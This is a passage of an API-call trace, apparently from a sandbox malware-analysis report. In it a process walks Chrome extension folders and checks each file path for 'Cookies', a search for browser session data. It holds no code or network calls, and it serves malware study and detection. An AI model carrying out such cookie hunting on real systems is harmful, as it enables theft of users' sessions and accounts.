lpString2=".") returned 1 [0163.520] lstrcmpiW (lpString1="lv", lpString2="..") returned 1 [0163.520] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.520] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.520] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.520] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.520] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json", lpSrch="Cookies") returned 0x0 [0163.521] lstrcmpiW (lpString1="ms", lpString2=".") returned 1 [0163.521] lstrcmpiW (lpString1="ms", lpString2="..") returned 1 [0163.521] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.521] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.521] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.521] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.521] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json", lpSrch="Cookies") returned 0x0 [0163.521] lstrcmpiW (lpString1="nl", lpString2=".") returned 1 [0163.521] lstrcmpiW (lpString1="nl", lpString2="..") returned 1 [0163.521] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.521] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.521] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.521] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.521] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.521] lstrcmpiW (lpString1="no", lpString2=".") returned 1 [0163.521] lstrcmpiW (lpString1="no", lpString2="..") returned 1 [0163.521] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.522] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.522] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.522] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.522] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json", lpSrch="Cookies") returned 0x0 [0163.522] lstrcmpiW (lpString1="pl", lpString2=".") returned 1 [0163.522] lstrcmpiW (lpString1="pl", lpString2="..") returned 1 [0163.522] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.522] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.522] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.522] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.522] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.522] lstrcmpiW (lpString1="pt_BR", lpString2=".") returned 1 [0163.522] lstrcmpiW (lpString1="pt_BR", lpString2="..") returned 1 [0163.522] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.523] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.523] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.523] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.523] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json", lpSrch="Cookies") returned 0x0 [0163.523] lstrcmpiW (lpString1="pt_PT", lpString2=".") returned 1 [0163.523] lstrcmpiW (lpString1="pt_PT", lpString2="..") returned 1 [0163.523] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.523] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.523] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.523] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.523] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json", lpSrch="Cookies") returned 0x0 [0163.524] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json", lpSrch="Cookies") returned 0x0 [0163.524] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json", lpSrch="Cookies") returned 0x0 [0163.524] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json", lpSrch="Cookies") returned 0x0 [0163.524] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.525] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.525] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json", lpSrch="Cookies") returned 0x0 [0163.525] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json", lpSrch="Cookies") returned 0x0 [0163.525] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.526] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json", lpSrch="Cookies") returned 0x0 [0163.526] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.526] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json", lpSrch="Cookies") returned 0x0 [0163.526] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json", lpSrch="Cookies") returned 0x0 [0163.527] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json", lpSrch="Cookies") returned 0x0 [0163.527] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json", lpSrch="Cookies") returned 0x0 [0163.527] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png", lpSrch="Cookies") returned 0x0 [0163.527] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json", lpSrch="Cookies") returned 0x0 [0163.528] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json", lpSrch="Cookies") returned 0x0 [0163.529] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json", lpSrch="Cookies") returned 0x0 [0163.529] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json", lpSrch="Cookies") returned 0x0 [0163.529] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json", lpSrch="Cookies") returned 0x0 [0163.529] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json", lpSrch="Cookies") returned 0x0 [0163.529] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json", lpSrch="Cookies") returned 0x0 [0163.530] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json", lpSrch="Cookies") returned 0x0 [0163.530] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json", lpSrch="Cookies") returned 0x0 [0163.530] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json", lpSrch="Cookies") returned 0x0 [0163.530] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json", lpSrch="Cookies") returned 0x0 [0163.530] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json", lpSrch="Cookies") returned 0x0 [0163.531] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json", lpSrch="Cookies") returned 0x0 [0163.531] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json", lpSrch="Cookies") returned 0x0 [0163.531] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.531] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json", lpSrch="Cookies") returned 0x0 [0163.531] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.532] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json", lpSrch="Cookies") returned 0x0 [0163.532] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.532] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.532] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json", lpSrch="Cookies") returned 0x0 [0163.532] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json", lpSrch="Cookies") returned 0x0 [0163.533] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json", lpSrch="Cookies") returned 0x0 [0163.533] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json", lpSrch="Cookies") returned 0x0 [0163.533] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json", lpSrch="Cookies") returned 0x0 [0163.533] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json", lpSrch="Cookies") returned 0x0 [0163.533] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json", lpSrch="Cookies") returned 0x0 [0163.536] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json", lpSrch="Cookies") returned 0x0 [0163.536] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.536] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json", lpSrch="Cookies") returned 0x0 [0163.536] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.536] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json", lpSrch="Cookies") returned 0x0 [0163.537] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json", lpSrch="Cookies") returned 0x0 [0163.537] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json", lpSrch="Cookies") returned 0x0 [0163.537] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json", lpSrch="Cookies") returned 0x0 [0163.537] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json", lpSrch="Cookies") returned 0x0 [0163.537] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.538] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.538] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json", lpSrch="Cookies") returned 0x0 [0163.538] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json", lpSrch="Cookies") returned 0x0 [0163.538] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.538] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json", lpSrch="Cookies") returned 0x0 [0163.539] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.539] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json", lpSrch="Cookies") returned 0x0 [0163.539] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json", lpSrch="Cookies") returned 0x0 [0163.539] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json", lpSrch="Cookies") returned 0x0 [0163.539] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png", lpSrch="Cookies") returned 0x0 [0163.539] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json", lpSrch="Cookies") returned 0x0 [0163.540] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json", lpSrch="Cookies") returned 0x0 [0163.541] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json", lpSrch="Cookies") returned 0x0 [0163.541] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json", lpSrch="Cookies") returned 0x0 [0163.541] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json", lpSrch="Cookies") returned 0x0 [0163.541] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json", lpSrch="Cookies") returned 0x0 [0163.541] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json", lpSrch="Cookies") returned 0x0 [0163.542] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json", lpSrch="Cookies") returned 0x0 [0163.542] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json", lpSrch="Cookies") returned 0x0 [0163.542] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json", lpSrch="Cookies") returned 0x0 [0163.542] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.542] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json", lpSrch="Cookies") returned 0x0 [0163.542] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.543] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json", lpSrch="Cookies") returned 0x0 [0163.543] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.543] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.543] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json", lpSrch="Cookies") returned 0x0 [0163.544] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json", lpSrch="Cookies") returned 0x0 [0163.544] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json", lpSrch="Cookies") returned 0x0 [0163.544] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json", lpSrch="Cookies") returned 0x0 [0163.544] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json", lpSrch="Cookies") returned 0x0 [0163.544] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS 